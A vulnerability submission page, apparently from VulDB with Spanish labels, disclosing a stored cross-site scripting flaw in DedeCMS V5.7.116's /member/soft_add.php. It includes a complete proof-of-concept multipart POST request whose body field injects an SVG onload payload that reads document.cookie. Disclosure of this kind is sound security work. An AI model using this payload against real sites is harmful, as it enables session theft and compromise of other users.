Enviar #453003: DedeCMS V5.7.116 Cross Site Scriptinginformación

TítuloDedeCMS V5.7.116 Cross Site Scripting
DescripciónSummary A stored Cross-Site Scripting (XSS) vulnerability has been identified in the DedeCMS V5.7.116 content management system. The vulnerability exists due to insufficient filtering of the body parameter in the /member/soft_add.php script. This issue allows an attacker to inject malicious scripts into software information pages, potentially compromising the security of the website and its users. Details The vulnerability is present in the /member/soft_add.php script, which does not adequately sanitize the body parameter. An attacker with the ability to register as a member and publish soft can exploit this flaw by injecting malicious scripts into the soft content. These scripts can be executed when other users view the compromised soft. Proof of Concept (POC) POST /member/soft_add.php HTTP/1.1 Host: target-ip Content-Length: 2657 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoNgLBRDOkaHmDGvr Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: [users'cookie] Connection: keep-alive ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dopost" save ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="channelid" 3 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="title" test soft ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="tags" test ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="writer" test ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="filetype" .exe ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="language" 简体中文 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softtype" 国产软件 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="accredit" 共享软件 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="os" Win2003,WinXP,Win2000,Win9X ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softrank" 3 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="officialDemo" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="officialUrl" http:// ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softsize" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="unit" MB ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="source" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="typeid" 18 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="needmoney" 0 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="litpic"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dede_addonfields" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dede_fieldshash" [users'fieldshash] ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="body" <p>asd</p><svg/onload=alert(document.cookie)> ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softurl1" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="servermsg1" 本地下载 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="picnum" 5 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr--
Fuente⚠️ https://github.com/Hebing123/cve/issues/78
Usuario
 jiashenghe (UID 39445)
Sumisión2024-11-27 10:34 (hace 2 años)
Moderación2024-12-04 17:31 (7 days later)
EstadoAceptado
Entrada de VulDB286904 [DedeCMS 5.7.116 /member/soft_add.php body secuencias de comandos en sitios cruzados]
Puntos20

AnteriorVisión De ConjuntoPróximo

Do you need the next level of professionalism?

Upgrade your account now!